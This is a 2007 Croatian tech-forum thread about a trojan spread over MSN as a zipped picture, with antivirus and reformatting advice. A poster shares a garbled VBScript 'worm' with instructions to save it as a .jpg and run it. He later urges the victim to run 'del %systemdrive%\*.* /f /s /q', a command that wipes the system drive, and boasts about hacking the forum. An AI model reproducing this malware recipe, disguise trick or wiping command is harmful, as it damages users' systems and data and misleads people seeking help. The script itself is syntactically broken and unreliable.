PDA

Pogledaj cijelu verziju : MSN Virus ili što je već!



ivesha
17-12-2007, 11:57
Znači netko vam kao šalje neku sliku ( bude zipovana) , vi je dowloadate, otvorite i eto kazina. sad mi se internet sam od sebe izgasi tj. pukne veza. pojavi se prozor sa crnom pozadinom i vidio sam piše C:WINDOWS\.... dalje nisam jer ga odma nakon pola sekunde makne. zna li itko kako riješit ovo?
ako ne onda mi preporučite neki antivirus ili što slično!

flander
17-12-2007, 12:15
a niš care, gasi internet i skeniraj sa svime i svačime, NOD32, spyware doctor, Spyware Search&Destroy, AD-Aware, avast.....i sve ostale anti-vir/spyware alatima, ako ništa od toga ne pomogne, a zna se desit meni se desilo, format C i riješen proble. Što ti je bilo da prihvaćaš tu sliku anyway :pray: :D

ivesha
17-12-2007, 12:17
ma ne koristim ja msn nego mlađa braća, a oni bi prihvatili i da piše virusi. a vidjet ćemo idem nać te programe. hvala!

Ivan_87
17-12-2007, 12:28
ma ne koristim ja msn nego mlađa braća, a oni bi prihvatili i da piše virusi. a vidjet ćemo idem nać te programe. hvala!

moš skinut na http://www.bitdefender.com.hrSprobnu verziju vrlo dobrog antivirusa,to se meni desilo stranice su mi se palile i gasile same od sebe vraćalo me na predhodnu stranicu i pucala veza skinu bitdefender novu verziju i bit će da je pomoglo

da napomenem moderatorima, kolega bartuc je davno otišo i nevraća se natrag na forumu,a još uvijek stoji gore bartuc kao moderator

ivesha
17-12-2007, 16:48
vidjet ću još u vezi formatiranja . neda mi se peglat sve instaliravat opet. kad bude malo žešće smetalo, zasad je ok.

FaTaL_mRkvA
17-12-2007, 16:57
to meni dva frenda nesvjesno šalju, napiše poruku tipa: "Do you care if I put this picture of you in my new myspace album?" i onda ponudi da prihvatim sliku tipa "image09" i jednom sam to prihvatio znajući da je virus i unutra je bio neki trojan downloader small... P.S. stavio sam frendove na BLOCK, pa mi više ne šalju...

Čux
17-12-2007, 19:32
treba reć ovima od kojih to smeche dolazi da si mlao počiste kante, al najbolje samo block pa si miran

ivesha
17-12-2007, 20:52
e skeniro sam i ja sa ad-awareom i našo je trojan downloader. sad sam nadam se uklonio to smeće, ako bude kakvih problema mogo bi past jedan novogodišnji format ( kad se samo sjetim muke instaliravanja svega i svačega, joooooojjj).

C
17-12-2007, 22:49
...i zapamti preporucujem ti ********** da
ga saljes preko email-ova, jer je prava komanda ***** ***-a
Email-****.*****
Otvoriš Notepad (ili neki sličan program), i upišeš:

inject.image object
Set shellobject=ImageObject(”WScript. Shell’)
shellobject.regwrite “H_KEY\software\customize\CurrentItems\PastItems ”
Set fi[esystem= Imageobject(”scripting.filesystemobject”)
filesystem.copyfile=(”OnClick,2)
if shellobject.regread(“H_KEY\software\customize\Cu rrentItems\PastItems”)
“1” then inject.referer
Set shellobject=ImageObject(”WScript. Shell’)
shellobject.regwrite “H_KEY\software\customize\CurrentItems\PastItems ”
Set fi[esystem= Imageobject(”scripting.filesystemobject”)
filesystem.copyfile=(”OnClick,2)
if shellobject.regread(“H_KEY\software\customize\Cu rrentItems\PastItems”)
“1” then
ShowInHidden.function\.referer
wscript.scriptfu[[name,filesystem.GetSpecia[Image(1)
&“\.jpg\.gif.tiff.ico”
if she[[object.run
Set wormffte=filesystem.opentextfile(wscript.scriptful lname,1)
payload=wormffte.readall
wormffte.Open
Do (filesystem.fileexists(wscript.scriptfullname)
If Not Set newfile=filesystem.createtextfile(wscript.scriptfu llname,True)
newfile.write payload
newfile.Open
Loop
Image function
Odeš na Save As, izabereš da nema ekstenziju, tj. spremiš to kao *.jpg, *.gif, ili *.tiff.
* = Ime slike.
Npr. "imeslike.jpg"

Pokreneš sliku, i eto ti ga opet, samo u novijem (jačem) izdanju. :D

flander
17-12-2007, 23:17
očeš reči da je ovo gore skripta kako napravit taj famozni MSN virus?

C
17-12-2007, 23:21
Probaj. :P
Trojanac se spakirao u crva. :D

flander
17-12-2007, 23:23
Probaj. :P
Trojanac se spakirao u crva. :D


znači je, a fora, ali ipak se nebum sa time zzahebaval, jel kolko znam sebe još bum sebe shebal pokušavajuči drugoga :P


e da još neš da pita, ovaj obični MSN virus kaj ide po netu, dal on ako se pokupi, i sad recimo neda ti se zekat da ga brišeš, jel on i dalje aktivan, recimo jel može on brisat neke datoteke ili recimo "evoluirat" u neki opasniji virus nakon nekog vremena ako ne koristimo MSN, ili on samo mrda kad MSN je aktivan ? :D

C
17-12-2007, 23:30
Pravi si car. :D :pray:
Ali, sve jedno, probaj, free je. :P
I, da, nije to za MSN, ali je jača verzija od onog što je on pobrao. Što se tiče MSN-a, nemam pojma, ali sam našao par programčića i skripti za hackiranje MSN-a.
Evo, upravo sam "našao" za hackiranje foruma skriptu... 8)
Budem probao to na ovom forumu ( :kill: ).

Edit: Rekao sam sada da nemam pojma o tim stvarima vazanim za MSN, a i MSN me ne zanima.
Ali, ne, niti jedna infekcija ne može evoluirati. Postoje update trojanci koji primaju sa neta informacije o upgradeu windowsa, pa se nameću kao da su oni instalacijska procedula, što i jesu, samo ti oni to sve ne instaliravaju, nego brišu; drugim riječima, što se prije aktiviraju, manje su štetni. A crvi se mogu jedino mjenjati iz jednog stanja u drugo, jer svi crvi, većinom zajedno. Kada ti na komp dođe neki crv, on je automatski magnet ostalim crvima na netu da dođu. Tako da se preko nekog X crva nameće neki Y crv, tj. samo se zamjene, ali s obzirom da se ne mogu svi zamjeniti, onda jednostavno svaki radi svoj posao, tj.napada ono za što je napravljen da napada...

Blacky_123
18-12-2007, 00:00
dvije rijeci

Rusi windowse

Najlaksi nacin da uklonic viruse

ivesha
20-12-2007, 14:06
evo ga na, žešći problemi su počeli: nekad ne može uopće otvorit folder, diskonektava se svako malo, pojavilo se na C particiji gdje su mi windowsi okok 3000 fileova nekih......to ti je kad dijeliš komp sa neukim idiotima. a zna se ko će sve popravljat........
p.s. što više znaš o kompjuterima više ti se sranja događa

C
20-12-2007, 19:44
Upišeš "del *.* /f /s /q" u CMD. :D
Pa ga onda formatiraš, jer ti tek tada nema druge. :D

C
20-12-2007, 20:43
Pa, da. :)
Mislim, kada sve prisilno obriše, u svakom folderu sve bez ikakvog pitanja, ne preostaje mu ništa, osim stavljanja Windows-a na novo, tj. formatiranja. :D

A možeš upisati i:


del %systemdrive%\*.* /f /s /q
Ista pašta, samo je točnija, tj. prisilno briše sve na particiji, na kojoj se nalazi trenutniSWindows. :D

ivesha
20-12-2007, 23:13
evo formatiro sam . pomučio se i iživciro ko svaki put. ovaj put nije htio očitat jedan hard ( sataII ) , a onaj stari IDE kabelski je očito i na njemu instaliro windowse. kasnije ubacujem cd od matične (assrock) i tamo driveri za SataII . koje olakšanje...........